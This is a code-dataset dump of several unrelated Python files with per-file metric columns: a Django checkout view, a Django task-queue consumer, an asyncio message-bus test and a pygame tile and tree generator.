default = form.cleaned_data.get('default')
use_default = form.cleaned_data.get('use_default')
state_option = form.cleaned_data.get('state_option')
payment_option = form.cleaned_data.get('payment_option')
# Create address and save it
address = Address(
user=self.request.user,
street_address=street_address,
street_address_2=street_address_2,
state_option=state_option,
)
address.save()
# Print form data
print(form.cleaned_data)
# Send emails
subject = 'Mascarillas y mas - Su orden fue recibida'
message = f'¡Gracias por ordenar!\n{first_name} {last_name} Su orden fue recibida. Lo antes posible alguien lo estara contactando para confirmar su orden.'
from_email = 'chandler240@gmail.com'
recipient_list = [email,]
send_mail(subject, message, from_email, recipient_list)
return redirect('after_checkout')
else:
# Check errors
# print(form.errors)
messages.warning(self.request, "Los campos Nombre, Apellido, Telefono y Email son necesarios")
# always return an address
return redirect('checkout')
| 42.537143
| 171
| 0.623052
| 894
| 7,444
| 5.038031
| 0.189038
| 0.036634
| 0.05595
| 0.071492
| 0.601021
| 0.541075
| 0.48468
| 0.471137
| 0.444494
| 0.444494
| 0
| 0.006102
| 0.273509
| 7,444
| 175
| 172
| 42.537143
| 0.826553
| 0.021628
| 0
| 0.482993
| 0
| 0.006803
| 0.130692
| 0.005916
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.054422
| 0
| 0.272109
| 0.006803
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee799216d33c9ed30924cce3dbebfa13f696710c
| 7,220
|
py
|
Python
|
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | null | null | null |
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | 5
|
2018-11-22T13:42:10.000Z
|
2019-09-16T13:00:41.000Z
|
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | null | null | null |
import importlib
import logging
import threading
from time import sleep
import timeout_decorator
from django_pglocks import advisory_lock
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from .constants import TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, TASKQ_DEFAULT_TASK_TIMEOUT
from .exceptions import Cancel, TaskLoadingError, TaskFatalError
from .models import Task
from .scheduler import Scheduler
from .task import Taskify
from .utils import task_from_scheduled_task, traceback_filter_taskq_frames, ordinal
logger = logging.getLogger('taskq')
class Consumer:
"""Collect and executes tasks when they are due."""
def __init__(self, sleep_rate=TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, execute_tasks_barrier=None):
"""Create a new Consumer.
:param sleep_rate: The time in seconds the consumer will wait between
each run loop iteration (mostly usefull when testing).
:param execute_tasks_barrier: Install the passed barrier in the
`execute_tasks_barrier` method to test its thread-safety. DO NOT USE
IN PRODUCTION.
"""
super().__init__()
self._should_stop = threading.Event()
self._scheduler = Scheduler()
# Test parameters
self._sleep_rate = sleep_rate
self._execute_tasks_barrier = execute_tasks_barrier
def stop(self):
logger.info('Consumer was asked to quit. '
'Terminating process in less than %ss.', self._sleep_rate)
self._should_stop.set()
@property
def stopped(self):
return self._should_stop.is_set()
def run(self):
"""The main entry point to start the consumer run loop."""
logger.info('Consumer started.')
while not self.stopped:
self.create_scheduled_tasks()
self.execute_tasks()
sleep(self._sleep_rate)
def create_scheduled_tasks(self):
"""Register new tasks for each scheduled (recurring) tasks defined in
the project settings.
"""
due_tasks = self._scheduler.due_tasks
if not due_tasks:
return
# Multiple instances of taskq rely on an advisory lock.
# This lock is self-exclusive so that only one session can hold it at a time.
# https://www.postgresql.org/docs/11/explicit-locking.html#ADVISORY-LOCKS
with advisory_lock("taskq_create_scheduled_tasks"):
for scheduled_task in due_tasks:
task_exists = Task.objects.filter(
name=scheduled_task.name,
due_at=scheduled_task.due_at
).exists()
if task_exists:
continue
task = task_from_scheduled_task(scheduled_task)
task.save()
self._scheduler.update_all_tasks_due_dates()
@transaction.atomic
def execute_tasks(self):
due_tasks = self.fetch_due_tasks()
# Only used when testing. Ask the consumers to wait for each others at
# the barrier.
if self._execute_tasks_barrier is not None:
self._execute_tasks_barrier.wait()
self.process_tasks(due_tasks)
def fetch_due_tasks(self):
# Multiple instances of taskq rely on select_for_update().
# This mechanism will lock selected rows until the end of the transaction.
# We also fetch STATUS_RUNNING in case of previous inconsistent state.
due_tasks = Task.objects.filter(
Q(status=Task.STATUS_QUEUED) | Q(status=Task.STATUS_RUNNING),
due_at__lte=timezone.now()
).select_for_update(skip_locked=True)
return due_tasks
def process_tasks(self, due_tasks):
for due_task in due_tasks:
self.process_task(due_task)
def process_task(self, task):
"""Load and execute the task"""
if task.timeout is None:
timeout = getattr(settings, 'TASKQ_TASK_TIMEOUT', TASKQ_DEFAULT_TASK_TIMEOUT)
else:
timeout = task.timeout
if not task.retries:
logger.info('%s : Started', task)
else:
nth = ordinal(task.retries)
logger.info('%s : Started (%s retry)', task, nth)
task.status = Task.STATUS_RUNNING
task.save()
def _execute_task():
function, args, kwargs = self.load_task(task)
self.execute_task(function, args, kwargs)
try:
if timeout.total_seconds():
assert threading.current_thread() is threading.main_thread()
timeout_decorator.timeout(seconds=timeout.total_seconds(), use_signals=True)(_execute_task)()
else:
_execute_task()
except TaskFatalError as e:
logger.info('%s : Fatal error', task)
self.fail_task(task, e)
except Cancel:
logger.info('%s : Canceled', task)
task.status = Task.STATUS_CANCELED
except timeout_decorator.TimeoutError as e:
logger.info('%s : Timed out', task)
self.fail_task(task, e)
except Exception as e:
if task.retries < task.max_retries:
logger.info('%s : Failed, will retry', task)
self.retry_task_later(task)
else:
logger.info('%s : Failed, exceeded max retries', task)
self.fail_task(task, e)
else:
logger.info('%s : Success', task)
task.status = Task.STATUS_SUCCESS
finally:
task.save()
def retry_task_later(self, task):
task.status = Task.STATUS_QUEUED
task.retries += 1
task.update_due_at_after_failure()
def fail_task(self, task, error):
task.status = Task.STATUS_FAILED
exc_traceback = traceback_filter_taskq_frames(error)
type_name = type(error).__name__
exc_info = (type(error), error, exc_traceback)
logger.exception('%s : %s %s', task, type_name, error, exc_info=exc_info)
def load_task(self, task):
function = self.import_taskified_function(task.function_name)
args, kwargs = task.decode_function_args()
return (function, args, kwargs)
def import_taskified_function(self, import_path):
"""Load a @taskified function from a python module.
Returns TaskLoadingError if loading of the function failed.
"""
# https://stackoverflow.com/questions/3606202
module_name, unit_name = import_path.rsplit('.', 1)
try:
module = importlib.import_module(module_name)
except (ImportError, SyntaxError) as e:
raise TaskLoadingError(e)
try:
obj = getattr(module, unit_name)
except AttributeError as e:
raise TaskLoadingError(e)
if not isinstance(obj, Taskify):
msg = f'Object "{import_path}" is not a task'
raise TaskLoadingError(msg)
return obj
def execute_task(self, function, args, kwargs):
"""Execute the code of the task"""
with transaction.atomic():
function._protected_call(args, kwargs)
| 34.380952
| 109
| 0.635457
| 875
| 7,220
| 5.025143
| 0.273143
| 0.021833
| 0.020014
| 0.022743
| 0.104389
| 0.043894
| 0.012281
| 0
| 0
| 0
| 0
| 0.002126
| 0.283241
| 7,220
| 209
| 110
| 34.545455
| 0.847536
| 0.165097
| 0
| 0.114286
| 0
| 0
| 0.055264
| 0.004747
| 0
| 0
| 0
| 0
| 0.007143
| 1
| 0.107143
| false
| 0
| 0.157143
| 0.007143
| 0.307143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7b13e3f8add887be12393c811c00fdb0fd0ddc
| 14,786
|
py
|
Python
|
async_message_bus_test.py
|
ifurusato/ros
|
77b1361e78f68f00ba2d3e3db908bb5ce0f973f5
|
[
"MIT"
] | 9
|
2020-10-12T08:49:55.000Z
|
2021-07-23T14:20:05.000Z
|
async_message_bus_test.py
|
fanmuzhi/ros
|
04534a35901341c4aaa9084bff3d46851795357d
|
[
"MIT"
] | 12
|
2020-07-22T19:08:58.000Z
|
2022-02-03T03:17:03.000Z
|
async_message_bus_test.py
|
fanmuzhi/ros
|
04534a35901341c4aaa9084bff3d46851795357d
|
[
"MIT"
] | 3
|
2020-07-19T20:43:19.000Z
|
2022-03-02T09:15:51.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2021-02-24
# modified: 2021-02-24
#
# see: https://www.aeracode.org/2018/02/19/python-async-simplified/
import sys, time, asyncio, itertools, traceback
from abc import ABC, abstractmethod
from collections import deque as Deque
import uuid
import random
from colorama import init, Fore, Style
init()
from lib.event import Event
from lib.ticker import Ticker
from lib.message import Message
from lib.message_factory import MessageFactory
from lib.logger import Logger, Level
#from mock.ifs import MockIntegratedFrontSensor
# ..............................................................................
class MessageBus():
'''
Message Bus description.
'''
def __init__(self, level=Level.INFO):
self._log = Logger('bus', level)
self._log.debug('initialised...')
self._subscriptions = set()
self._log.debug('ready.')
# ..........................................................................
@property
def subscriptions(self):
'''
Return the current set of Subscriptions.
'''
return self._subscriptions
# ..........................................................................
def publish(self, message: Message):
'''
Publishes the Message to all Subscribers.
'''
self._log.info(Style.BRIGHT + 'publish message: {}'.format(message))
for queue in self._subscriptions:
queue.put_nowait(message)
# ..............................................................................
class Subscription():
'''
A subscription on the MessageBus.
'''
def __init__(self, message_bus, level=Level.WARN):
self._log = Logger('subscription', level)
self._log.debug('__init__')
self._message_bus = message_bus
self.queue = asyncio.Queue()
def __enter__(self):
self._log.debug('__enter__')
self._message_bus._subscriptions.add(self.queue)
return self.queue
def __exit__(self, type, value, traceback):
self._log.debug('__exit__')
self._message_bus._subscriptions.remove(self.queue)
# ..............................................................................
class Subscriber(ABC):
'''
Abstract subscriber functionality, to be subclassed by any classes
that subscribe to a MessageBus.
'''
def __init__(self, name, message_bus, level=Level.WARN):
self._log = Logger('subscriber-{}'.format(name), level)
self._name = name
self._log.debug('Subscriber created.')
self._message_bus = message_bus
self._log.debug('ready.')
# ..............................................................................
@property
def name(self):
return self._name
# ..............................................................................
def filter(self, message):
'''
Abstract filter: if not overridden, the default is simply to pass the message.
'''
self._log.info(Fore.RED + 'FILTER Subscriber.filter(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value))
return message
# ..............................................................................
@abstractmethod
async def handle_message(self, message):
'''
Abstract function that receives a message obtained from a Subscription
to the MessageBus, performing an actions based on receipt.
This is to be subclassed to provide message handling/processing functionality.
'''
_event = message.event
_message = self.filter(message)
if _message:
self._log.info(Fore.GREEN + 'FILTER-PASS: Subscriber.handle_message(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{} .'.format(_message.value))
else:
self._log.info(Fore.GREEN + Style.DIM + 'FILTERED-OUT: Subscriber.handle_message() event: {}'.format(_event.name))
return _message
# ..............................................................................
@abstractmethod
async def subscribe(self):
'''
DESCRIPTION.
'''
self._log.debug('subscribe called.')
await asyncio.sleep(random.random() * 8)
self._log.info(Fore.GREEN + 'Subscriber {} has subscribed.'.format(self._name))
_message_count = 0
_message = Message(-1, Event.NO_ACTION, None) # initial non-null message
with Subscription(self._message_bus) as queue:
while _message.event != Event.SHUTDOWN:
_message = await queue.get()
# self._log.info(Fore.GREEN + '1. calling handle_message()...')
self.handle_message(_message)
# self._log.info(Fore.GREEN + '2. called handle_message(), awaiting..')
_message_count += 1
self._log.info(Fore.GREEN + 'Subscriber {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
if random.random() < 0.1:
self._log.info(Fore.GREEN + 'Subscriber {} has received enough'.format(self._name))
break
self._log.info(Fore.GREEN + 'Subscriber {} is shutting down after receiving {:d} messages.'.format(self._name, _message_count))
# ..............................................................................
class Publisher(ABC):
'''
Abstract publisher, subclassed by any classes that publish to a MessageBus.
'''
def __init__(self, message_factory, message_bus, level=Level.INFO):
self._log = Logger('pub', level)
self._log.info(Fore.MAGENTA + 'Publisher: create.')
self._message_factory = message_factory
self._message_bus = message_bus
self._counter = itertools.count()
self._log.debug('ready.')
# ..........................................................................
def get_message_of_type(self, event, value):
'''
Provided an Event type and a message value, returns a Message
generated from the MessageFactory.
'''
return self._message_factory.get_message(event, value)
def get_random_event_type(self):
types = [ Event.STOP, Event.INFRARED_PORT, Event.INFRARED_STBD, Event.FULL_AHEAD, Event.ROAM, Event.EVENT_R1 ]
return types[random.randint(0, len(types)-1)]
# ..........................................................................
@abstractmethod
async def publish(self, iterations):
'''
DESCRIPTION.
'''
self._log.info(Fore.MAGENTA + Style.BRIGHT + 'Publish called.')
for x in range(iterations):
self._log.info(Fore.MAGENTA + 'Publisher: I have {} subscribers now'.format(len(self._message_bus.subscriptions)))
_uuid = str(uuid.uuid4())
_message = self.get_message_of_type(self.get_random_event_type(), 'msg_{:d}-{}'.format(x, _uuid))
_message.number = next(self._counter)
self._message_bus.publish(_message)
await asyncio.sleep(1)
_shutdown_message = self.get_message_of_type(Event.SHUTDOWN, 'shutdown')
self._message_bus.publish(_shutdown_message)
# ..............................................................................
class MySubscriber(Subscriber):
'''
Extends Subscriber as a typical subscriber use case class.
'''
def __init__(self, name, ticker, message_bus, level=Level.INFO):
super().__init__(name, message_bus, level)
self._log.info(Fore.YELLOW + 'MySubscriber-{}: create.'.format(name))
self._ticker = ticker
self._ticker.add_callback(self.tick)
self._discard_ignored = True
_queue_limit = 10
self._deque = Deque([], maxlen=_queue_limit)
self._log.debug('ready.')
# ..............................................................................
def queue_peek(self):
'''
Returns a peek at the last Message of the queue or None if empty.
'''
return self._deque[-1] if self._deque else None
# ..............................................................................
def queue_length(self):
return len(self._deque)
# ..............................................................................
def print_queue_contents(self):
str_list = []
for _message in self._deque:
str_list.append('-- msg#{}/{}/{}\n'.format(_message.number, _message.eid, _message.event.name))
return ''.join(str_list)
# ..............................................................................
def tick(self):
'''
Callback from the Ticker, used to pop the queue of any messages.
'''
_peek = self.queue_peek()
if _peek: # queue was not empty
self._log.debug(Fore.WHITE + 'TICK! {:d} in queue.'.format(len(self._deque)))
# we're only interested in types Event.INFRARED_PORT or Event.INFRARED_CNTR
if _peek.event is Event.INFRARED_PORT or _peek.event is Event.INFRARED_STBD:
_message = self._deque.pop()
self._log.info(Fore.WHITE + 'MESSAGE POPPED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
time.sleep(3.0)
self._log.info(Fore.WHITE + Style.BRIGHT + 'MESSAGE PROCESSED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
else: # we're not interested
if self._discard_ignored:
_message = self._deque.pop()
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE discarded: {}'.format(_message.event.name))
else:
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE ignored: {}'.format(_peek.event.name))
else:
self._log.debug(Style.DIM + 'TICK! {:d} in empty queue.'.format(len(self._deque)))
# queue
# ..............................................................................
def filter(self, message):
'''
'''
return message if ( message.event is Event.INFRARED_PORT or message.event is Event.INFRARED_STBD ) else None
# ..............................................................................
def handle_message(self, message):
'''
Extends the superclass' method, with a substantial delay to test
whether the call is synchronous or asynchronous.
'''
self._deque.appendleft(message)
self._log.info(Fore.YELLOW + 'MySubscriber add to queue: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value) \
+ Style.BRIGHT + ' {} in queue.'.format(len(self._deque)))
# ..............................................................................
def subscribe(self):
'''
Subscribes to the MessageBus by passing the call to the superclass.
'''
self._log.debug(Fore.YELLOW + 'MySubscriber.subscribe() called.')
return super().subscribe()
# ..............................................................................
class MyPublisher(Publisher):
'''
DESCRIPTION.
'''
def __init__(self, message_factory, message_bus, level=Level.INFO):
super().__init__(message_factory, message_bus, level)
# self._log = Logger('my-pub', level)
self._message_bus = message_bus # probably not needed
self._log.info('ready.')
# ..........................................................................
def publish(self, iterations):
'''
DESCRIPTION.
'''
self._log.info(Fore.MAGENTA + Style.BRIGHT + 'MyPublish called, passing... ========= ======= ======== ======= ======== ')
return super().publish(iterations)
# main .........................................................................
#_log = Logger('main', Level.INFO)
def main(argv):
_log = Logger("main", Level.INFO)
try:
_log.info(Fore.BLUE + 'configuring objects...')
_loop_freq_hz = 10
_ticker = Ticker(_loop_freq_hz, Level.INFO)
_message_factory = MessageFactory(Level.INFO)
_message_bus = MessageBus()
# _publisher = Publisher(_message_bus)
_publisher = MyPublisher(_message_factory, _message_bus)
# _publisher.enable()
_publish = _publisher.publish(10)
_log.info(Fore.BLUE + 'generating subscribers...')
_subscribers = []
_subscriptions = []
for x in range(10):
_subscriber = MySubscriber('s{}'.format(x), _ticker, _message_bus)
_subscribers.append(_subscriber)
_subscriptions.append(_subscriber.subscribe())
_ticker.enable()
loop = asyncio.get_event_loop()
_log.info(Fore.BLUE + 'starting loop...')
loop.run_until_complete(asyncio.gather(_publish, *_subscriptions))
_log.info(Fore.BLUE + 'closing {} subscribers...'.format(len(_subscribers)))
for subscriber in _subscribers:
_log.info(Fore.BLUE + 'subscriber {} has {:d} messages remaining in queue: {}'.format(subscriber.name, subscriber.queue_length(), _subscriber.print_queue_contents()))
_log.info(Fore.BLUE + 'loop complete.')
except KeyboardInterrupt:
_log.info('caught Ctrl-C; exiting...')
except Exception:
_log.error('error processing message bus: {}'.format(traceback.format_exc()))
finally:
_log.info('exit.')
# call main ....................................................................
if __name__== "__main__":
main(sys.argv[1:])
#EOF
| 42.245714
| 178
| 0.540714
| 1,473
| 14,786
| 5.204345
| 0.205024
| 0.035612
| 0.035873
| 0.037177
| 0.331594
| 0.246282
| 0.170493
| 0.152231
| 0.126272
| 0.126272
| 0
| 0.005136
| 0.223049
| 14,786
| 349
| 179
| 42.366762
| 0.662169
| 0.249019
| 0
| 0.134021
| 0
| 0
| 0.129683
| 0.007589
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118557
| false
| 0.010309
| 0.056701
| 0.010309
| 0.273196
| 0.010309
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7ba2306ea22a03b64701fd0713ad3f2419cb98
| 2,113
|
py
|
Python
|
terrain_gen.py
|
MrKren/TTA
|
3a677337fbcca199a88c64248af89d0889b960dd
|
[
"MIT"
] | null | null | null |
terrain_gen.py
|
MrKren/TTA
|
3a677337fbcca199a88c64248af89d0889b960dd
|
[
"MIT"
] | null | null | null |
terrain_gen.py
|
MrKren/TTA
|
3a677337fbcca199a88c64248af89d0889b960dd
|
[
"MIT"
] | null | null | null |
import pygame
import random
class Tile(pygame.sprite.Sprite):
"""Tile class that acts as a sprite"""
# Creates sprite tile with image
def __init__(self, original_image, mask_image):
super().__init__()
self.image = original_image
self.mask_image = mask_image
self.rect = self.image.get_rect()
self.mask = pygame.mask.from_surface(self.mask_image)
# Adds movement to the game
def movex(self, speed):
self.rect.x += speed
def movey(self, speed):
self.rect.y += speed
class GenTerrain(object):
"""Generates all tiles within a specified range"""
def __init__(self, tile_size, l_x, l_y, image):
# List of tiles that can be added to sprite Group
self.tile_list = []
# For loop that generates each sprite for each tile on the map
for i in range(l_x):
for j in range(l_y):
xpos = i*tile_size
ypos = j*tile_size
pos = xpos, ypos
tile = Tile(image, image)
tile.rect.x, tile.rect.y = pos
self.tile_list.append(tile)
print("Tiles Added:", len(self.tile_list))
class GenTrees(object):
def __init__(self, tile_size, map_size, images, mask_images, percentage):
self.tree_list = []
mask_image = mask_images[0]
for i in range(map_size-2):
for j in range(map_size-3):
if random.randrange(0, 10000, 1)/10000 < percentage:
xpos = (i+1)*tile_size
ypos = (j+1)*tile_size
pos = xpos, ypos
tree_image = random.choice(images)
if tree_image == images[0]:
mask_image = mask_images[0]
if tree_image == images[1]:
mask_image = mask_images[1]
tree = Tile(tree_image, mask_image)
tree.rect.x, tree.rect.y = pos
self.tree_list.append(tree)
print("Trees Added:", len(self.tree_list))
| 30.185714
| 77
| 0.546143
| 273
| 2,113
| 4.025641
| 0.278388
| 0.065514
| 0.047316
| 0.051865
| 0.105551
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015487
| 0.358258
| 2,113
| 69
| 78
| 30.623188
| 0.794985
| 0.115476
| 0
| 0.090909
| 0
| 0
| 0.012938
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113636
| false
| 0
| 0.045455
| 0
| 0.227273
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|